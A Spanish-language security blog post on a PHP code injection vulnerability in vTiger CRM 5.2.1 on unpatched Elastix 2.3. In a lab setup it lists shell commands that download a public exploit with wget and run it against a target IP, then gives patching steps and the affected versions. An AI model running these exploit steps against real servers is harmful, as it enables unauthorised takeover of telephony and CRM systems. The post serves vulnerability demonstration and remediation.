php-code-inyection

De regreso con las vulnerabilidades en VTIGER, anteriormente habíamos hablado de «Vulnerabilidad de directorios transversales» que afecta hasta implementaciones en Goautodial. En este oportunidad, vamos hablar otra denominada «PHP Code Injection» , el fundamento básico de esta técnica, es inyectar código arbitrario, como lo hace una inyección SQL.

Lo delicado de esto, es que se ha desarrollado un programa a modo de  «exploit» que automatiza este ataque, para tomar el control de una plataforma Elastix primordialmente, que tiene la version de Vtiger vulnerable.

Más adelante, me tomare el tiempo, para explicar como funciona el programa al detalle, por ahora me interesa, mostrar cómo se ejecuta el exploit, cómo funciona cuando es exitoso,  y después como lo parchamos, para que la vulnerabilidad ya no este activa.

Escenario de prueba

Atacante
SO : Kali Linux 32bits
Atacado
SO : Elastix 2.3 recien instalado y sin actualizar

1.-Explotando nuestro sistema y viendo si somos vulnerables.

#apt-get install php5-curl curl
#wget http://packetstormsecurity.com/files/download/119253/elastix23-exec.txt
#mv elastix23-exec.txt elastix.php
#chmod a+wrx elastix.php
#php elastix.php

Nos solicita ingresar la direccion IP del host atacado
Enter Target [https://ip] # https://192.168.10.142

Si el exploit es satifactorio, habremos optenido el acceso como lo muestra el siguiente video

2.- Parchando la vulnerabilidad

Aactualizacion a VTIGET 5.2.1-7
#yum update elastix-vtigercrm

o la que mas me gusta  , Como diria mi abuela , que en paz descanse …. santo remedio hijo !!  😀
#mv /var/www/html/vtigercrm /root/


3.- Condiciones
– Si bien es cierto el «exploit» esta enfocado a Elastix, con algunas modificaciones , puede funcionar para cualquier otra plataforma que user Vtiger.
– Solo afecta a implementaciones de Elastix 2.3 sin Actualizar que contengan Vtiger Crm
– No afecta a Elastix 2.4 , debido a que ya tiene la actualización por default.

2 respuestas a “Explotando vulnerabilidad PHP Code Injection Exploit en VTIGER 5.2.1”

  1. Avatar de pal-live@hotmail.com
    pal-live@hotmail.com
  2. Avatar de Gerardo Barajas
    Gerardo Barajas

    Pues ni tanto 😛
    Acabo de ver un server con la versión más actual (elastix-vtigercrm-5.2.1-7) y aún así lo hackearon.

Deja un comentario

Juan Oliva

Consultor en Ciberseguridad y VoIP con mas de 16 años de experiencia en el campo, muy involucrado en proyectos de Ethical Hacking, análisis y explotación de vulnerabilidades en infraestructura, aplicaciones web, APIs y Móviles, pruebas de ingeniería social y revisión de código.